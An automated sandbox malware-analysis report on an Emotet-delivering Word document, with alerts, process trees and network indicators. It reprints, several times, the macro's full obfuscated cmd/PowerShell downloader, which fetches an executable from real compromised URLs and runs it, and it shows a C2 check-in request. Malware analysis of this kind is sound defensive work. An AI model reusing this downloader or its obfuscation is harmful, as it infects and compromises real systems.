malicious
02vPLpWc
This report is generated from a file or URL submitted to this webservice on May 17th 2018 09:52:19 (UTC)
Guest System: Windows 7 32 bit, Home Premium, 6.1 (build 7601), Service Pack 1, Office 2010 v14.0.4
Report generated by
Falcon Sandbox v8.10 © Hybrid Analysis
Incident Response
Risk Assessment
- Remote Access
- Uses network protocols on unusual ports
- Persistence
- Spawns a lot of processes
- Network Behavior
- Contacts 1 domain and 3 hosts. View all details
Additional Context
Related Sandbox Artifacts
- Associated URLs
- hxxp://avirtualassistant.net/02vPLpWc/
Indicators
Not all malicious and suspicious indicators are displayed. Get your own cloud service or the full version to view all details.
-
Malicious Indicators 12
-
External Systems
-
Detected Suricata Alert
- details
-
Detected alert "ETPRO TROJAN W32/Emotet CnC Checkin" (SID: 2830701, Rev: 2, Severity: 1) categorized as "A Network Trojan was detected" (Backdoor, ransomware, trojans, etc.)
Detected alert "ET POLICY PE EXE or DLL Windows file download HTTP" (SID: 2018959, Rev: 3, Severity: 1) categorized as "Potential Corporate Privacy Violation" - source
- Suricata Alerts
- relevance
- 10/10
-
Found an IP/URL artifact that was identified as malicious by a significant amount of reputation engines
- details
- 3/67 reputation engines marked "http://ifcingenieria.cl" as malicious (4% detection rate)
- source
- External System
- relevance
- 10/10
-
Sample was identified as malicious by at least one Antivirus engine
- details
- 7/57 Antivirus vendors marked sample as malicious (12% detection rate)
- source
- External System
- relevance
- 8/10
-
Detected Suricata Alert
-
General
-
Document spawns new processes
- details
- Document spawned a new process (macro present)
- source
- Indicator Combinations
- relevance
- 7/10
-
GETs files from a webserver
- details
-
"GET /76j4qo/ HTTP/1.1Host: ifcingenieria.clConnection: Keep-Alive"
"GET / HTTP/1.1Cookie: 22986=YfPsLfSbd4Y/yDt9dkvBSyvzDiRk06hQ5kQKootMxRN16gKf7UDw5xeHQLGa+63Wa0LEVngjmjKQ6hEk5Dzv7Z6dLgr1u/GUPvPdvLwQwpGMoAqqBHs1nd2IkkR1JLMCqAsQ9a/GfLtFsCWc5Ht5U5YctPH0LQcsHMl8hpOvk3qoq5Z3KA42kojnnkoWCvXUDeTyBS/rUgviG4oaBZKYIO7Mrw4KazYAWAVZtMGA7qrGrnyrb/DMu81dPHWovrDOa2smKTNrTdvKCagZSdJhgFgqJy1JZwHDpBSiuiKgmzgULEjmMZAZ7l8UR91gAP9iPPkT+vCJ8sEKv4r6Rs4AmisCKCx8Xb1TT1c6T+yoa+rTHauO808jGdH+om/jDqXJYzas5zuOKxkZ3YIL3GpCjMqhZEVkext9KubxIwe6Ww8zbnjIUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 81.21.67.85:8080Connection: Keep-AliveCache-Control: no-cache" - source
- Network Traffic
- relevance
- 10/10
-
Document spawns new processes
-
Installation/Persistance
-
Writes data to a remote process
- details
-
"cmd.exe" wrote 32 bytes to a remote process "%WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe" (Handle: 84)
"cmd.exe" wrote 52 bytes to a remote process "%WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe" (Handle: 84)
"cmd.exe" wrote 4 bytes to a remote process "%WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe" (Handle: 84)
"powershell.exe" wrote 32 bytes to a remote process "%PUBLIC%\166520.exe" (Handle: 1548)
"powershell.exe" wrote 52 bytes to a remote process "%PUBLIC%\166520.exe" (Handle: 1548)
"powershell.exe" wrote 4 bytes to a remote process "%PUBLIC%\166520.exe" (Handle: 1548)
"166520.exe" wrote 32 bytes to a remote process "%WINDIR%\System32\cosineinit.exe" (Handle: 436)
"166520.exe" wrote 52 bytes to a remote process "%WINDIR%\System32\cosineinit.exe" (Handle: 436)
"166520.exe" wrote 4 bytes to a remote process "%WINDIR%\System32\cosineinit.exe" (Handle: 436) - source
- API Call
- relevance
- 6/10
-
Writes data to a remote process
-
Network Related
-
Malicious artifacts seen in the context of a contacted host
- details
-
Found malicious artifacts related to "138.0.120.12": ...
URL: http://vertek.cl/ (AV positives: 1/67 scanned on 04/27/2018 15:47:08)
URL: http://ifcingenieria.cl/ (AV positives: 3/67 scanned on 04/26/2018 10:45:03)
URL: http://ifcingenieria.cl/ni9tsuvgzii (AV positives: 3/67 scanned on 04/25/2018 18:44:00)
URL: http://ifcingenieria.cl/ni9TSuVGZII/ (AV positives: 2/67 scanned on 04/25/2018 17:24:27)
URL: http://kundaliniyogasimran.cl/WysiwygPro/editor_files/_images/cds-food-azar/cooking-a-smoked-pork-shoulder-picnic.html (AV positives: 1/67 scanned on 03/22/2018 07:35:55)
File SHA256: 3801181d5eec749898527ebc4279741acbc9f82c8aa72f8be272031d67eea76b (AV positives: 10/59 scanned on 04/25/2018 13:51:22)
File SHA256: 3f73123b71be81eb666247aaee7f7fb33ffc0160f29c586623067044b6521bb0 (AV positives: 10/70 scanned on 04/25/2018 11:56:13)
File SHA256: 77795c8a3c5a8ff8129cb4db828828c53a590f93583fcfb0b1112a4e670c97d4 (AV positives: 1/56 scanned on 05/19/2017 09:54:38)
File SHA256: a2cad944f3399bde2a5691c14be8b4f939898b5a97dadd579aff3390cdf3624f (AV positives: 1/56 scanned on 07/19/2016 09:29:10) - source
- Network Traffic
- relevance
- 10/10
-
Uses network protocols on unusual ports
- details
- TCP traffic to 81.21.67.85 on port 8080
- source
- Network Traffic
- relevance
- 7/10
-
Malicious artifacts seen in the context of a contacted host
-
Unusual Characteristics
-
Contains embedded VBA macros with keywords that indicate auto-execute behavior
- details
- Found keyword "AutoOpen" which indicates: "Runs when the Word document is opened"
- source
- Static Parser
- relevance
- 10/10
-
Spawns a lot of processes
- details
-
Spawned process "WINWORD.EXE" with commandline "/n "C:\02vPLpWc.doc"" (Show Process)
Spawned process "cmd.exe" with commandline "Cmd NiFNFLos YkMLGzjoazWTFMzoErTtjZAZ btnSkEoS & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %HvpurunsRmnvjbm%=zJlPRBwG&&set %pKskGkVXEDjT%=p&&set %dowlFKYHb%=o^w&&set %GTHGTVYqDCTUTHV%=JNMwizhaTsz&&set %LYpRJHtwuOCsR%=!%pKskGkVXEDjT%!&&set %fFhDGzjnXmhYvNz%=hHRrroJFEpzXJ&&set %musHwkwosI%=e^r&&set %fBZnrWF%=!%dowlFKYHb%!&&set %oXmdLMdsYfUoN%=s&&set %lhmbWskWwNVkUzp%=oQllFASCBHr&&set %XwERnXf%=he&&set %mGqOdYnIP%=ll&&!%LYpRJHtwuOCsR%!!%fBZnrWF%!!%musHwkwosI%!!%oXmdLMdsYfUoN%!!%XwERnXf%!!%mGqOdYnIP%! ". ( $psHOme[4]+$Pshome[30]+'x') ( ((' ((9Um1xAnsada9Um+9'+'Ums9Um+9Umd = &9Um+9Um(O9Um+9UmQJn9Um+9UmO9Um+9UmQJ+OQJ9Um+9UmeOQJ+OQ9Um+9UmJw-ob9Um+9Umj9Um+9UmecOQJ+OQ9Um+9UmJ9Um+9UmtOQJ9Um+9Um) ran9Um+9Umdom;9Um+9Um'+'1x9Um+9Um'+'A9Um+9UmYY9Um+9UmU 9Um+9Um= .'+'9Um+9Um(9U'+'m+9UmO9Um+9UmQJneO9Um+9UmQJ+OQJwOQ9Um+9UmJ+OQJ-o9Um+9Umbject9Um+9UmO9Um+9UmQJ) Syst9Um+9Umem9Um+9Um.Net.W9Um+9UmebClient;'+'1xA9Um+9UmNS9Um+9UmB = 19Um+9Umx9Um+9U'+'mAn9Um+9Um'+'sadas9Um+9Umd.next(9Um+9Um10009Um+9Um0, 9'+'Um+9Um29Um+9Um82133'+');1xA9Um+9UmADCX9Um+9Um = OQJ9Um+9'+'Um 9Um+9Um http9Um+9Um://i9Um+9Umfc9Um+9Umingen9Um+9Umier9Um+9Umia.9Um+9Umc9Um+9Uml/9Um+9Um79Um+9Um'+'6j9Um+9Um49Um+'+'9Umq9Um+9Umo'+'/@9Um+'+'9Umht9Um+9Umtp9Um+9Um:9Um+9Um//9Um+9Umk9Um+9Ume9Um+9Umith9Um+9Umda9Um+9Umley.co.u9Um+9Umk/wp9Um+9Ump-app/R9Um+9Umaoz/@h9Um+9Umttp:/9Um+9Um/is9Um+9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9Umne9Um+9Umt.eu/D9Um+9Um505IR9Um+9Um1/O9Um+9UmQJ.9Um+9UmS9Um+9Umplit(9Um+9UmOQ9Um+9UmJ@O9Um+9UmQJ);1xASDC'+' 9Um+9Um= 9Um+9Um19Um+9Umx9Um+9UmA9Um+9Ume9Um+9Umnv:9Um+9Umpu9Um+9Umbl9Um+9Umi'+'c + O9'+'Um+9UmQ9'+'Um+9UmJ19xOQJ 9Um+9Um+ 1xA9Um+9UmNSB 9Um+9Um+ 9Um+9Um('+'OQJ9U'+'m+9Um.9Um+9Ume9Um+9Umx9Um+9UmOQJ+9Um+9UmOQ9Um+9UmJ'+'e9Um+9UmOQ9Um+9UmJ);'+'fo'+'9Um+9Umre9Um+9Uma9Um+9Umc9Um+9'+'Umh(19Um+9UmxA9Um+9Umasf9U'+'m+9Umc 9Um'+'+9Umin 1x9Um+9UmAADC9Um+9UmX){tr9Um+9Umy{1xA9Um+9UmYYU.9epD9Um+9Umo9Um+9UmftD9U'+'m+9UmWnlftD9Um+9UmOa9Um+9UmdFIftDle9e'+'p9Um+9Um(1'+'xAas9Um+9Umfc.99Um+9Ume9Um+9UmpToStrftDiftDNg9Um+9Um9e9Um+9Ump()9Um+9Um
19U'+'m+9UmxASDC);9Um'+'+9Um&(OQJ9Um+9UmIn9Um+9UmvoO9Um+9UmQJ+OQJ'+'kOQ9Um+9UmJ+OQJ9Um+9Ume-9Um+9UmIt9Um+9UmemOQJ)9Um+9Um(19Um+9UmxA9Um+9UmS9Um+9UmDC'+'9Um+9Um);9'+'Um+9Umbrea9Um+9Umk;}9Um+9Umcatch{9Um+9Um'+'}'+'}9Um) -rEplACe9UmftD'+'9Um
[CHAR]96-rEplACe ([C'+'HAR]57+'+'[CHAR]10'+'1+['+'CHAR]112)
[CHAR]34 -'+'r'+'EplACe 9Um19'+'x9Um'+'
[CHAR]92-CReplace '+' ([CHAR]79+[C'+'HAR]81+[C'+'HAR]74)
[CHA'+'R]39 -CReplace 9Um1'+'xA9Um
'+'[CHAR]36) 6aj.( u'+'iCpShOMe[4]+uiCpsHome[34'+']+9Umx9Um)')-rePlAcE([cHar]57+[cHar]85+[cHar]109),[cHar]39 -CrepLacE 'uiC',[cHar]36 -rePlAcE ([cHar]54+[cHar]97+[cHar]106),[cHar]124))" (Show Process), Spawned process "powershell.exe" with commandline "powershell ". ( $psHOme[4]+$Pshome[30]+'x') ( ((' ((9Um1xAnsada9Um+9'+'Ums9Um+9Umd = &9Um+9Um(O9Um+9UmQJn9Um+9UmO9Um+9UmQJ+OQJ9Um+9UmeOQJ+OQ9Um+9UmJw-ob9Um+9Umj9Um+9UmecOQJ+OQ9Um+9UmJ9Um+9UmtOQJ9Um+9Um) ran9Um+9Umdom;9Um+9Um'+'1x9Um+9Um'+'A9Um+9UmYY9Um+9UmU 9Um+9Um= .'+'9Um+9Um(9U'+'m+9UmO9Um+9UmQJneO9Um+9UmQJ+OQJwOQ9Um+9UmJ+OQJ-o9Um+9Umbject9Um+9UmO9Um+9UmQJ) Syst9Um+9Umem9Um+9Um.Net.W9Um+9UmebClient;'+'1xA9Um+9UmNS9Um+9UmB = 19Um+9Umx9Um+9U'+'mAn9Um+9Um'+'sadas9Um+9Umd.next(9Um+9Um10009Um+9Um0, 9'+'Um+9Um29Um+9Um82133'+');1xA9Um+9UmADCX9Um+9Um = OQJ9Um+9'+'Um 9Um+9Um http9Um+9Um://i9Um+9Umfc9Um+9Umingen9Um+9Umier9Um+9Umia.9Um+9Umc9Um+9Uml/9Um+9Um79Um+9Um'+'6j9Um+9Um49Um+'+'9Umq9Um+9Umo'+'/@9Um+'+'9Umht9Um+9Umtp9Um+9Um:9Um+9Um//9Um+9Umk9Um+9Ume9Um+9Umith9Um+9Umda9Um+9Umley.co.u9Um+9Umk/wp9Um+9Ump-app/R9Um+9Umaoz/@h9Um+9Umttp:/9Um+9Um/is9Um+9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9Umne9Um+9Umt.eu/D9Um+9Um505IR9Um+9Um1/O9Um+9UmQJ.9Um+9UmS9Um+9Umplit(9Um+9UmOQ9Um+9UmJ@O9Um+9UmQJ);1xASDC'+' 9Um+9Um= 9Um+9Um19Um+9Umx9Um+9UmA9Um+9Ume9Um+9Umnv:9Um+9Umpu9Um+9Umbl9Um+9Umi'+'c + O9'+'Um+9UmQ9'+'Um+9UmJ19xOQJ 9Um+9Um+ 1xA9Um+9UmNSB 9Um+9Um+ 9Um+9Um('+'OQJ9U'+'m+9Um.9Um+9Ume9Um+9Umx9Um+9UmOQJ+9Um+9UmOQ9Um+9UmJ'+'e9Um+9UmOQ9Um+9UmJ);'+'fo'+'9Um+9Umre9Um+9Uma9Um+9Umc9Um+9'+'Umh(19Um+9UmxA9Um+9Umasf9U'+'m+9Umc 9Um'+'+9Umin 1x9Um+9UmAADC9Um+9UmX){tr9Um+9Umy{1xA9Um+9UmYYU.9epD9Um+9Umo9Um+9UmftD9U'+'m+9UmWnlftD9Um+9UmOa9Um+9UmdFIftDle9e'+'p9Um+9Um(1'+'xAas9Um+9Umfc.99Um+9Ume9Um+9UmpToStrftDiftDNg9Um+9Um9e9Um+9Ump()9Um+9Um
19U'+'m+9UmxASDC);9Um'+'+9Um&(OQJ9Um+9UmIn9Um+9UmvoO9Um+9UmQJ+OQJ'+'kOQ9Um+9UmJ+OQJ9Um+9Ume-9Um+9UmIt9Um+9UmemOQJ)9Um+9Um(19Um+9UmxA9Um+9UmS9Um+9UmDC'+'9Um+9Um);9'+'Um+9Umbrea9Um+9Umk;}9Um+9Umcatch{9Um+9Um'+'}'+'}9Um) -rEplACe9UmftD'+'9Um
[CHAR]96-rEplACe ([C'+'HAR]57+'+'[CHAR]10'+'1+['+'CHAR]112)
[CHAR]34 -'+'r'+'EplACe 9Um19'+'x9Um'+'
[CHAR]92-CReplace '+' ([CHAR]79+[C'+'HAR]81+[C'+'HAR]74)
[CHA'+'R]39 -CReplace 9Um1'+'xA9Um
'+'[CHAR]36) 6aj.( u'+'iCpShOMe[4]+uiCpsHome[34'+']+9Umx9Um)')-rePlAcE([cHar]57+[cHar]85+[cHar]109),[cHar]39 -CrepLacE 'uiC'
[cHar]36 -rePlAcE ([cHar]54+[cHar]97+[cHar]106)
[cHar]124))" (Show Process), Spawned process "166520.exe" (Show Process), Spawned process "cosineinit.exe" (Show Process) - source
- Monitored Target
- relevance
- 8/10
-
Contains embedded VBA macros with keywords that indicate auto-execute behavior
-
Hiding 2 Malicious Indicators
- All indicators are available only in the private webservice or standalone version
-
Suspicious Indicators 13
-
External Systems
-
Detected Suricata Alert
- details
- Detected alert "ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download" (SID: 2016538, Rev: 3, Severity: 2) categorized as "Potentially Bad Traffic"
- source
- Suricata Alerts
- relevance
- 10/10
-
Found an IP/URL artifact that was identified as malicious by at least one reputation engine
- details
- 3/67 reputation engines marked "http://ifcingenieria.cl" as malicious (4% detection rate)
- source
- External System
- relevance
- 10/10
-
Detected Suricata Alert
-
General
-
Found a potential E-Mail address in binary/memory
- details
-
Pattern match: "lrqjor@acfarihso2squ.eozmftwzaojzglmgx275315aeb"
Pattern match: "570kmqatvuhjlu@qculdb.8z59uesf7p82066"
Pattern match: "sczcin3c7bopwqupp@51rtqrehb58ot.rddqrbi"
Pattern match: "pe9eldtfifdaex@lnwbyu9odpe9.uyy"
Pattern match: "tn@eilcbetw.ten.mu" - source
- File/Memory
- relevance
- 3/10
-
Found a potential E-Mail address in binary/memory
-
Installation/Persistance
-
Creates new processes
- details
-
"WINWORD.EXE" is creating a new process (Name: "%WINDIR%\System32\cmd.exe", Handle: 1308)
"cmd.exe" is creating a new process (Name: "%WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe", Handle: 84)
"powershell.exe" is creating a new process (Name: "%PUBLIC%\166520.exe", Handle: 1548)
"166520.exe" is creating a new process (Name: "%WINDIR%\System32\cosineinit.exe", Handle: 436) - source
- API Call
- relevance
- 8/10
-
Drops executable files
- details
- "166520.exe" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
- source
- Binary File
- relevance
- 10/10
-
Opens the MountPointManager (often used to detect additional infection locations)
- details
-
"WINWORD.EXE" opened "\Device\MountPointManager"
"powershell.exe" opened "\Device\MountPointManager"
"166520.exe" opened "\Device\MountPointManager" - source
- API Call
- relevance
- 5/10
-
Creates new processes
-
Network Related
-
Found potential IP address in binary/memory
- details
- "81.21.67.85"
- source
- File/Memory
- relevance
- 3/10
-
Uses a User Agent typical for browsers, although no browser was ever launched
- details
- Found user agent(s): Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
- source
- Network Traffic
- relevance
- 10/10
-
Found potential IP address in binary/memory
-
System Security
-
Modifies proxy settings
- details
-
"powershell.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
"powershell.exe" (Access type: "DELETEVAL"; Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
"cosineinit.exe" (Access type: "SETVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYENABLE"; Value: "00000000")
"cosineinit.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYSERVER")
"cosineinit.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYOVERRIDE") - source
- Registry Access
- relevance
- 10/10
-
Modifies proxy settings
-
Unusual Characteristics
-
Contains embedded VBA macros with suspicious keywords
- details
-
Found suspicious keyword "Shell" which indicates: "May run an executable file or a system command"
Found suspicious keyword "Chr" which indicates: "May attempt to obfuscate specific strings (use option --deobf to deobfuscate)"
Found suspicious keyword "StrReverse" which indicates: "May attempt to obfuscate specific strings (use option --deobf to deobfuscate)" - source
- Static Parser
- relevance
- 10/10
-
Executes powershell accessing native variables
- details
-
Process "powershell.exe" with commandline "powershell ". ( $psHOme[4]+$Pshome[30]+'x') ( ((' ((9Um1xAnsada9Um+9'+'Ums9Um+9Umd = &9Um+9Um(O9Um+9UmQJn9Um+9UmO9Um+9UmQJ+OQJ9Um+9UmeOQJ+OQ9Um+9UmJw-ob9Um+9Umj9Um+9UmecOQJ+OQ9Um+9UmJ9Um+9UmtOQJ9Um+9Um) ran9Um+9Umdom;9Um+9Um'+'1x9Um+9Um'+'A9Um+9UmYY9Um+9UmU 9Um+9Um= .'+'9Um+9Um(9U'+'m+9UmO9Um+9UmQJneO9Um+9UmQJ+OQJwOQ9Um+9UmJ+OQJ-o9Um+9Umbject9Um+9UmO9Um+9UmQJ) Syst9Um+9Umem9Um+9Um.Net.W9Um+9UmebClient;'+'1xA9Um+9UmNS9Um+9UmB = 19Um+9Umx9Um+9U'+'mAn9Um+9Um'+'sadas9Um+9Umd.next(9Um+9Um10009Um+9Um0, 9'+'Um+9Um29Um+9Um82133'+');1xA9Um+9UmADCX9Um+9Um = OQJ9Um+9'+'Um 9Um+9Um http9Um+9Um://i9Um+9Umfc9Um+9Umingen9Um+9Umier9Um+9Umia.9Um+9Umc9Um+9Uml/9Um+9Um79Um+9Um'+'6j9Um+9Um49Um+'+'9Umq9Um+9Umo'+'/@9Um+'+'9Umht9Um+9Umtp9Um+9Um:9Um+9Um//9Um+9Umk9Um+9Ume9Um+9Umith9Um+9Umda9Um+9Umley.co.u9Um+9Umk/wp9Um+9Ump-app/R9Um+9Umaoz/@h9Um+9Umttp:/9Um+9Um/is9Um+9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9Umne9Um+9Umt.eu/D9Um+9Um505IR9Um+9Um1/O9Um+9UmQJ.9Um+9UmS9Um+9Umplit(9Um+9UmOQ9Um+9UmJ@O9Um+9UmQJ);1xASDC'+' 9Um+9Um= 9Um+9Um19Um+9Umx9Um+9UmA9Um+9Ume9Um+9Umnv:9Um+9Umpu9Um+9Umbl9Um+9Umi'+'c + O9'+'Um+9UmQ9'+'Um+9UmJ19xOQJ 9Um+9Um+ 1xA9Um+9UmNSB 9Um+9Um+ 9Um+9Um('+'OQJ9U'+'m+9Um.9Um+9Ume9Um+9Umx9Um+9UmOQJ+9Um+9UmOQ9Um+9UmJ'+'e9Um+9UmOQ9Um+9UmJ);'+'fo'+'9Um+9Umre9Um+9Uma9Um+9Umc9Um+9'+'Umh(19Um+9UmxA9Um+9Umasf9U'+'m+9Umc 9Um'+'+9Umin 1x9Um+9UmAADC9Um+9UmX){tr9Um+9Umy{1xA9Um+9UmYYU.9epD9Um+9Umo9Um+9UmftD9U'+'m+9UmWnlftD9Um+9UmOa9Um+9UmdFIftDle9e'+'p9Um+9Um(1'+'xAas9Um+9Umfc.99Um+9Ume9Um+9UmpToStrftDiftDNg9Um+9Um9e9Um+9Ump()9Um+9Um
19U'+'m+9UmxASDC);9Um'+'+9Um&(OQJ9Um+9UmIn9Um+9UmvoO9Um+9UmQJ+OQJ'+'kOQ9Um+9UmJ+OQJ9Um+9Ume-9Um+9UmIt9Um+9UmemOQJ)9Um+9Um(19Um+9UmxA9Um+9UmS9Um+9UmDC'+'9Um+9Um);9'+'Um+9Umbrea9Um+9Umk;}9Um+9Umcatch{9Um+9Um'+'}'+'}9Um) -rEplACe9UmftD'+'9Um
[CHAR]96-rEplACe ([C'+'HAR]57+'+'[CHAR]10'+'1+['+'CHAR]112)
[CHAR]34 -'+'r'+'EplACe 9Um19'+'x9Um'+'
[CHAR]92-CReplace '+' ([CHAR]79+[C'+'HAR]81+[C'+'HAR]74)
[CHA'+'R]39 -CReplace 9Um1'+'xA9Um
'+'[CHAR]36) 6aj.( u'+'iCpShOMe[4]+uiCpsHome[34'+']+9Umx9Um)')-rePlAcE([cHar]57+[cHar]85+[cHar]109),[cHar]39 -CrepLacE 'uiC'
[cHar]36 -rePlAcE ([cHar]54+[cHar]97+[cHar]106)
[cHar]124))" (Indicator: "$pshome"
UID: 00045885-00003800) - source
- Monitored Target
- relevance
- 10/10
-
Extensive usage of escape characters in the commandline
- details
-
Process "cmd.exe" with commandline "Cmd NiFNFLos YkMLGzjoazWTFMzoErTtjZAZ btnSkEoS & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %HvpurunsRmnvjbm%=zJlPRBwG&&set %pKskGkVXEDjT%=p&&set %dowlFKYHb%=o^w&&set %GTHGTVYqDCTUTHV%=JNMwizhaTsz&&set %LYpRJHtwuOCsR%=!%pKskGkVXEDjT%!&&set %fFhDGzjnXmhYvNz%=hHRrroJFEpzXJ&&set %musHwkwosI%=e^r&&set %fBZnrWF%=!%dowlFKYHb%!&&set %oXmdLMdsYfUoN%=s&&set %lhmbWskWwNVkUzp%=oQllFASCBHr&&set %XwERnXf%=he&&set %mGqOdYnIP%=ll&&!%LYpRJHtwuOCsR%!!%fBZnrWF%!!%musHwkwosI%!!%oXmdLMdsYfUoN%!!%XwERnXf%!!%mGqOdYnIP%! ". ( $psHOme[4]+$Pshome[30]+'x') ( ((' ((9Um1xAnsada9Um+9'+'Ums9Um+9Umd = &9Um+9Um(O9Um+9UmQJn9Um+9UmO9Um+9UmQJ+OQJ9Um+9UmeOQJ+OQ9Um+9UmJw-ob9Um+9Umj9Um+9UmecOQJ+OQ9Um+9UmJ9Um+9UmtOQJ9Um+9Um) ran9Um+9Umdom;9Um+9Um'+'1x9Um+9Um'+'A9Um+9UmYY9Um+9UmU 9Um+9Um= .'+'9Um+9Um(9U'+'m+9UmO9Um+9UmQJneO9Um+9UmQJ+OQJwOQ9Um+9UmJ+OQJ-o9Um+9Umbject9Um+9UmO9Um+9UmQJ) Syst9Um+9Umem9Um+9Um.Net.W9Um+9UmebClient;'+'1xA9Um+9UmNS9Um+9UmB = 19Um+9Umx9Um+9U'+'mAn9Um+9Um'+'sadas9Um+9Umd.next(9Um+9Um10009Um+9Um0, 9'+'Um+9Um29Um+9Um82133'+');1xA9Um+9UmADCX9Um+9Um = OQJ9Um+9'+'Um 9Um+9Um http9Um+9Um://i9Um+9Umfc9Um+9Umingen9Um+9Umier9Um+9Umia.9Um+9Umc9Um+9Uml/9Um+9Um79Um+9Um'+'6j9Um+9Um49Um+'+'9Umq9Um+9Umo'+'/@9Um+'+'9Umht9Um+9Umtp9Um+9Um:9Um+9Um//9Um+9Umk9Um+9Ume9Um+9Umith9Um+9Umda9Um+9Umley.co.u9Um+9Umk/wp9Um+9Ump-app/R9Um+9Umaoz/@h9Um+9Umttp:/9Um+9Um/is9Um+9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9Umne9Um+9Umt.eu/D9Um+9Um505IR9Um+9Um1/O9Um+9UmQJ.9Um+9UmS9Um+9Umplit(9Um+9UmOQ9Um+9UmJ@O9Um+9UmQJ);1xASDC'+' 9Um+9Um= 9Um+9Um19Um+9Umx9Um+9UmA9Um+9Ume9Um+9Umnv:9Um+9Umpu9Um+9Umbl9Um+9Umi'+'c + O9'+'Um+9UmQ9'+'Um+9UmJ19xOQJ 9Um+9Um+ 1xA9Um+9UmNSB 9Um+9Um+ 9Um+9Um('+'OQJ9U'+'m+9Um.9Um+9Ume9Um+9Umx9Um+9UmOQJ+9Um+9UmOQ9Um+9UmJ'+'e9Um+9UmOQ9Um+9UmJ);'+'fo'+'9Um+9Umre9Um+9Uma9Um+9Umc9Um+9'+'Umh(19Um+9UmxA9Um+9Umasf9U'+'m+9Umc 9Um'+'+9Umin 1x9Um+9UmAADC9Um+9UmX){tr9Um+9Umy{1xA9Um+9UmYYU.9epD9Um+9Umo9Um+9UmftD9U'+'m+9UmWnlftD9Um+9UmOa9Um+9UmdFIftDle9e'+'p9Um+9Um(1'+'xAas9Um+9Umfc.99Um+9Ume9Um+9UmpToStrftDiftDNg9Um+9Um9e9Um+9Ump()9Um+9Um
19U'+'m+9UmxASDC);9Um'+'+9Um&(OQJ9Um+9UmIn9Um+9UmvoO9Um+9UmQJ+OQJ'+'kOQ9Um+9UmJ+OQJ9Um+9Ume-9Um+9UmIt9Um+9UmemOQJ)9Um+9Um(19Um+9UmxA9Um+9UmS9Um+9UmDC'+'9Um+9Um);9'+'Um+9Umbrea9Um+9Umk;}9Um+9Umcatch{9Um+9Um'+'}'+'}9Um) -rEplACe9UmftD'+'9Um
[CHAR]96-rEplACe ([C'+'HAR]57+'+'[CHAR]10'+'1+['+'CHAR]112)
[CHAR]34 -'+'r'+'EplACe 9Um19'+'x9Um'+'
[CHAR]92-CReplace '+' ([CHAR]79+[C'+'HAR]81+[C'+'HAR]74)
[CHA'+'R]39 -CReplace 9Um1'+'xA9Um
